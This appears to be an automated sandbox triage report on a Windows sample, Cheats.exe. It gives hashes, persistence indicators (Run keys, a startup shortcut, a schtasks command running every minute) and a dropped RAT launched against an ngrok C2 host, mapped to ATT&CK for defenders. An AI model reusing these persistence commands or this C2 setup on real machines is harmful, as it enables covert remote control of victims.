399350fa770109605394a96f46edd77f1b3895f8b1ea435c34240a0d40c10b76 | Triage

Analysis

max time kernel
21s
max time network
20s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
29-06-2024 15:43

Sharing

Report Analysis Logs

General

Target

Cheats.exe
Size

1.8MB
MD5

4f40fe592b8c8dde38b0e56d1c987060
SHA1

73d386dddf6d9aa2ba7347b54d7adb370e35163e
SHA256

399350fa770109605394a96f46edd77f1b3895f8b1ea435c34240a0d40c10b76
SHA512

3c7ae1bc65ca98312e3798f5d41942208e7d3a0bff950ad262b7d63a2c46f485e16aa5e2427896e712ee38dac2815a8e8e6d3a8919a04ef21395adfec65d1e40
SSDEEP

24576:4HnYUXRQmcVNit/+nmGSbhn1s6zUwY4x2FiZlD+DnX7gSf:4HYUXGvbmGSbh1s69YbFifyjcSf

Score

7^/10

persistence

Malware Config

Signatures

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updater.lnk	Cheats.exe

Executes dropped EXE 1 IoCs

pid	Process
3680	RD-127.0.0.1_56923_485150.EXE

Adds Run key to start application 2 TTPs 2 IoCs

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\updater = "\"C:\\Program Files\\Chrome\\updater.exe\""	Cheats.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\updater = "\"C:\\Program Files\\Chrome\\updater.exe\""	Cheats.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service

flow	ioc
1	0.tcp.eu.ngrok.io

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Chrome\updater.exe	Cheats.exe
File opened for modification	C:\Program Files\Chrome\updater.exe	Cheats.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Kills process with taskkill 1 IoCs

pid	Process
2824	taskkill.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2352	schtasks.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4880	Cheats.exe
Token: SeDebugPrivilege	2824	taskkill.exe

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 4880 wrote to memory of 2352	4880	Cheats.exe	73
PID 4880 wrote to memory of 2352	4880	Cheats.exe	73
PID 4880 wrote to memory of 3680	4880	Cheats.exe	78
PID 4880 wrote to memory of 3680	4880	Cheats.exe	78
PID 4880 wrote to memory of 3680	4880	Cheats.exe	78
PID 4880 wrote to memory of 2824	4880	Cheats.exe	79
PID 4880 wrote to memory of 2824	4880	Cheats.exe	79

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Cheats.exe
"C:\Users\Admin\AppData\Local\Temp\Cheats.exe"
1⤵
- Drops startup file
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4880
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "updater" /tr "C:\Program Files\Chrome\updater.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2352
- C:\Users\Admin\AppData\Local\Temp\RD-127.0.0.1_56923_485150.EXE
  "C:\Users\Admin\AppData\Local\Temp\RD-127.0.0.1_56923_485150.EXE" 0.tcp.eu.ngrok.io<ZTPLG>18765<ZTPLG>127.0.0.1:56923<ZTPLG>|<'ZT_RAT_by7d87BgX8Q3'>|
  2⤵
  - Executes dropped EXE
  PID:3680
- C:\Windows\SYSTEM32\taskkill.exe
  taskkill /f /im RD-127.0.0.1_56923_485150.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2824

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Scheduled Task

Persistence

Boot or Logon Autostart Execution

Registry Run Keys / Startup Folder

Scheduled Task/Job

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

Registry Run Keys / Startup Folder

Scheduled Task/Job

Scheduled Task

Defense Evasion

Modify Registry

Credential Access

Discovery

Query Registry

System Information Discovery

Lateral Movement

Collection

Command and Control

Web Service

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RD-127.0.0.1_56923_485150.EXE

Filesize
86KB

MD5
0d13c4f28e151a5fc8242b40b8f53f8b

SHA1
24fb8416d5b47a9326b61e0352b06830ff5f3814

SHA256
9385f46f06cb900620b91e0f704df2af1efd44ed5b7d06b4f0b862f55f825bc8

SHA512
279d5f7f2d74096dea8f8b5bf38faf18d9ce17e5e764e9d9a753d8b664412677d4c9dcd93b26549797ba2aedb4b26c7c64924def3aeba9ea7fe1c5a84ad63ea6

Download Submit
memory/3680-16-0x0000000004900000-0x000000000499C000-memory.dmp

Filesize
624KB

Download
memory/3680-14-0x0000000073F8E000-0x0000000073F8F000-memory.dmp

Filesize
4KB

Download
memory/3680-15-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/3680-17-0x0000000004B20000-0x000000000501E000-memory.dmp

Filesize
5.0MB

Download
memory/3680-18-0x00000000049D0000-0x0000000004A62000-memory.dmp

Filesize
584KB

Download
memory/3680-19-0x0000000004AE0000-0x0000000004AEA000-memory.dmp

Filesize
40KB

Download
memory/3680-20-0x00000000050E0000-0x0000000005136000-memory.dmp

Filesize
344KB

Download
memory/3680-21-0x0000000073F80000-0x000000007466E000-memory.dmp

Filesize
6.9MB

Download
memory/3680-22-0x0000000073F80000-0x000000007466E000-memory.dmp

Filesize
6.9MB

Download
memory/4880-2-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp

Filesize
9.9MB

Download
memory/4880-0-0x00007FFA64193000-0x00007FFA64194000-memory.dmp

Filesize
4KB

Download
memory/4880-1-0x0000000000C60000-0x0000000000E3A000-memory.dmp

Filesize
1.9MB

Download
memory/4880-23-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp

Filesize
9.9MB

Download